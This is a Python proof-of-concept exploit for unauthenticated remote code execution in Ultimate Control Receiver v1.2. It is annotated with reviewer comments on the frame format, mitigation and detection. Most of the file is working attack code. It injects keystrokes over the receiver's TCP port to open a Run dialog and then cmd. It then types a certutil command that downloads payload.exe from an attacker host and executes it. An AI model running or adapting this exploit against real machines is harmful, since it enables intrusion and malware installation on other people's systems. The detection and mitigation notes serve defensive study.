# Exploit Title: Ultimate Control Receiver (v1.2) - Remote Code Execution
# Date: 2/08/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.negusoft.com/
# Software Link: https://www.negusoft.com/ucontrol/downloads/pc.html
# Version: 1.2
# Tested on: Windows 10

'''
Description:
Ultimate Control Receiver v1.2 is vulnerable to unauthenticated remote code
execution. An attacker can exploit the keyboard input functionality over TCP
to execute arbitrary system commands on the target machine without user
interaction.
'''

# Reviewer notes (what this PoC shows, read from the code below):
# - Every frame is a fixed 32 bytes. Bytes 0 and 1 carry the same value
#   (3, 17 or 18 in this file), a big-endian u32 sits at offset 4 and a
#   big-endian millisecond timestamp at offset 24.
# - Nothing resembling a credential, token or pairing value is sent before
#   the key-input frames, which matches the "unauthenticated" claim above.
#   Exposure is therefore anyone who can reach the receiver's TCP port.
# - Mitigation visible from here: restrict reachability of the listener
#   port (host firewall, network segmentation) and keep the receiver off
#   untrusted networks.
# - Detection: process-creation telemetry for certutil invoked with
#   "-urlcache -f" writing an .exe under \windows\temp, and a Run-dialog
#   launched cmd.exe shortly after an inbound connection to the receiver.

import socket
import time
import struct

TARGET_IP = "192.168.1.203"
TARGET_PORT = 13894
LHOST = "192.168.1.63"

# Windows virtual-key codes used by the key-input frames.
VK_RETURN = 0x0D
VK_LWIN = 0x5B
VK_R = 0x52


def create_type_char_message(character):
    """Return the 32-byte frame that types one character.

    Layout written here: bytes 0-1 = 18, bytes 4-7 = code point of
    *character* (big-endian u32), bytes 24-31 = current time in
    milliseconds (big-endian u64). All other bytes stay zero.
    """
    frame = bytearray(32)
    frame[0] = frame[1] = 18
    struct.pack_into(">I", frame, 4, ord(character))
    struct.pack_into(">Q", frame, 24, int(time.time() * 1000))
    return frame


def create_key_input_message(vk_code, input_type=0, command=False):
    """Return the 32-byte frame for a virtual-key event.

    Layout written here: bytes 0-1 = 17, byte 2 = 0x10 when *command* is
    truthy else 0, byte 3 = wire value derived from *input_type*,
    bytes 4-7 = *vk_code* (big-endian u32), bytes 24-31 = current time in
    milliseconds (big-endian u64).

    NOTE(review): judging by the call order in send_win_r, input_type 2
    looks like key-down, 1 like key-up and 0 like a full press — inferred,
    not documented anywhere in this file.
    """
    frame = bytearray(32)
    frame[0] = frame[1] = 17
    frame[2] = (1 << 4) if command else 0

    # input_type -> byte 3; any other value leaves byte 3 at its initial 0.
    for candidate, wire_value in ((0, 0), (1, 3), (2, 1)):
        if input_type == candidate:
            frame[3] = wire_value
            break

    struct.pack_into(">I", frame, 4, vk_code)
    struct.pack_into(">Q", frame, 24, int(time.time() * 1000))
    return frame


def send_character(sock, character):
    """Send one type-character frame on *sock*, then pause 50 ms."""
    frame = create_type_char_message(character)
    sock.send(frame)
    time.sleep(0.05)


def send_string(sock, text):
    """Send *text* one character frame at a time via send_character."""
    for ch in text:
        send_character(sock, ch)


def send_win_r():
    """Open a session and send the Win+R key chord.

    Returns True when every step completed, False on any exception
    (connection failure, timeout, ...).
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    with conn:
        conn.settimeout(5)
        try:
            conn.connect((TARGET_IP, TARGET_PORT))
            # Opening frame: type bytes 3, 3 followed by 30 zero bytes; the
            # 32-byte reply is read and discarded.
            conn.sendall(bytes([3, 3]) + bytes(30))
            conn.recv(32)

            chord = (
                (VK_LWIN, 2),
                (VK_R, 2),
                (VK_R, 1),
                (VK_LWIN, 1),
            )
            for vk, kind in chord:
                conn.send(create_key_input_message(vk, kind, True))
            time.sleep(0.5)
        except Exception:
            return False
        return True


def send_cmd_command():
    """Open a session, type the download-and-run command line, press Return.

    Returns True when every step completed, False on any exception.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    with conn:
        conn.settimeout(10)
        try:
            conn.connect((TARGET_IP, TARGET_PORT))
            conn.sendall(bytes([3, 3]) + bytes(30))
            conn.recv(32)

            # certutil -urlcache used as a downloader: a well-known
            # living-off-the-land pattern and a solid detection anchor.
            command = f"certutil -urlcache -f http://{LHOST}/payload.exe \\windows\\temp\\payload.exe && \\windows\\temp\\payload.exe"
            send_string(conn, command)
            conn.send(create_key_input_message(VK_RETURN))
        except Exception:
            return False
        return True


def main():
    """Run the three stages in order: Win+R, "cmd" + Return, command line.

    Each stage uses its own TCP connection; the sequence stops silently at
    the first stage that fails.
    """
    if not send_win_r():
        return
    time.sleep(3)

    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    with conn:
        conn.settimeout(10)
        try:
            conn.connect((TARGET_IP, TARGET_PORT))
            conn.sendall(bytes([3, 3]) + bytes(30))
            conn.recv(32)
            send_string(conn, "cmd")
            conn.send(create_key_input_message(VK_RETURN))
            time.sleep(2)
        except Exception:
            return

    time.sleep(3)
    send_cmd_command()


if __name__ == "__main__":
    main()